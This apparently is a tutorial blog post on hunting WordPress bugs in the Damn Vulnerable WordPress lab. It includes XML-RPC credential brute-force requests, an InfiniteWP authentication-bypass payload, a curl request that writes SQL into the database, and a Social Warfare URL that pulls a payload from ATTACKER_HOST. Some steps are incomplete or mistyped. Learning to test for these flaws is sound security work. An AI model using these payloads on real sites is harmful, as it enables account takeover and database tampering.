WordPress Bug Bounty Guide

Introduction
WordPress is the most popular CMS, powering over 40% of websites. This widespread use makes it a prime target for hackers—and an excellent opportunity for ethical hackers and bug bounty hunters. Companies and website owners rely on security researchers to find and report vulnerabilities before malicious attackers exploit them.

If you’re new to bug hunting and want to explore WordPress security the right way, this guide will help you get started. We’ll cover essential tools, common vulnerabilities, and best practices for reporting security flaws. Whether you’re looking to sharpen your cybersecurity skills or earn rewards through bug bounty programs, this guide is your roadmap to success.

Setting up the WordPress Pentesting Lab

Before diving into the real scenarios, better to try on test environment to avoid any legal issues. Use the Damm Vulnerable WordPress(DVWP), it’s a playground for practicing WordPress hacking and wpscan testing. It includes many vulnerabilities, which we are going to explore in this guide.

Installing DVWP with Docker
Use the following commands to set up DVWP on your local machine.

$ git clone https://github.com/vavkamil/dvwp.git
$ cd dvwp/
$ docker-compose up -d --build
$ docker-compose run --rm wp-cli install-wp
$ docker-compose up -d

WP-JSON User Enumeration

WordPress exposes user data through the REST API, which can be exploited for user enumeration. Attackers can retrieve usernames using. You can try any of the below paths to check.

/wp-json/wp/v2/users/
?rest_route=/wp/v2/users

If user enumeration is enabled, this API will list usernames as below, which can be used in brute-force attacks.

HackerOne report – https://hackerone.com/reports/1735586

XML-RPC Issues

XML-RPC is a remote procedure call (RPC) protocol used in WordPress. If enabled, it can lead to multiple vulnerabilities, including:

Brute Force Attacks: Attackers can test multiple passwords using a single request.
Pingback Exploitation: The XML-RPC pingback feature can be used for DDoS attacks.

Check whether xmlrpc.php file is available or not.

In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

By using the below method, can brute force the user credentials.

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

HackerOne report – https://hackerone.com/reports/1619536

Directory Listing & Sensitive Data Exposure

Many websites expose sensitive files due to improper directory permissions. You can use tools like dirsearch or ffuf for directory fuzzing, or google dorks to find sensitive data.

site:example.com filetype:sql
site:example.com inurl:adminer.php

ffuf -u http://127.0.0.1:31337/FUZZ -mc 200 -w ~/wordlist/common.txt

Common files that should not be publicly accessible include, which you can explore on the DVWP lab.

• info.php – PHP configuration details
• dump.sql – Database dump
• adminer.php – Web-based database management tool
• php.ini – PHP configuration file
• cgi-bin/ – Common script directory
• .git/logs/ – Git repository logs

Vulnerable WordPress Plugins & Exploits

WPScan is a powerful security scanner for WordPress that helps identify vulnerabilities in plugins, themes, and user enumeration. Make sure to register to wpscan – https://wpscan.com/register/ and use the API key during the scan.

wpscan --url http://172.17.0.1:31337/ --enumerate p --api-token <token-value>

Many WordPress vulnerabilities arise from outdated or poorly coded plugins. Here are some notable vulnerabilities and their exploits:

InfiniteWP Client < 1.9.4.5

• Vulnerability: Authentication Bypass (CVE-2020-8772)
• Description: The InfiniteWP Client plugin allows administrators to manage multiple WordPress sites from a central dashboard. A logical flaw allows attackers to bypass authentication using a specially crafted request.
• Exploitation:

Encode the below payload in Base64 using the encoder.

{"iwp_action":"add_site","params":{"username":"admin"}}

Send the crafted request and change the request type to POST.

_IWP_JSON_PREFIX_base64-encoded-payload

Check the response in the browser.

Refresh it and check the result.

Try manual exploit – https://www.exploit-db.com/exploits/47939 or use Metasploit Framework.

WP Advanced Search < 3.3.4

• Vulnerability: Unauthenticated Database Access & Remote Code Execution
• Description: The WP Advanced Search plugin allows users to create advanced search queries. Older versions expose a database endpoint that allows unauthenticated users to query the WordPress database.
• Exploitation:

Send the crafted request via the curl command.

curl -i -s -k -X 'POST' \
  -H 'Host: 172.17.0.1:31337' -H 'User-Agent: Mozilla/5.0' \
  -H 'Accept: text/html' -H 'Content-Type: multipart/form-data; boundary=----boundary' \
  --data-binary $'------boundary\r\nContent-Disposition: form-data; name="wp_advanced_search_file_import"; filename="test.sql"\r\nContent-Type: application/sql\r\n\r\nupdate wp_users set display_name="Pentestguy" where id = 1;\r\n------boundary--\r\n' \
  'http://172.17.0.1:31337/wp-admin/admin-post.php?action=db_import'

After executing the crafted request, verify the changed username, and try multiple attacks like remote code execution.

Reference – https://wpscan.com/vulnerability/f0573253-9dd4-4c73-aa2e-867c9caae0dc/

Social Warfare <= 3.5.2

• Vulnerability: Unauthenticated Arbitrary Settings Update (CVE-2019-9978)
• Description: This vulnerability allows an unauthenticated attacker to modify WordPress settings, potentially redirecting users to malicious sites.
• Exploitation:

Create payload.txt which includes the below code.

Host it on a server accessible by a targeted website.

python3 -m http.sever

 Visit http://TARGET/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt

Reference – https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/

Conclusion

This guide covered essential WordPress security testing techniques, including setting up a vulnerable test environment, exploiting common vulnerabilities, and using security tools like WPScan. Always ensure ethical hacking practices by testing only in authorized environments.

If you found this guide helpful, share it with your peers and leave a comment with your thoughts or suggestions. Want to collaborate with us? Visit our collaboration page to learn more. Thank you for reading!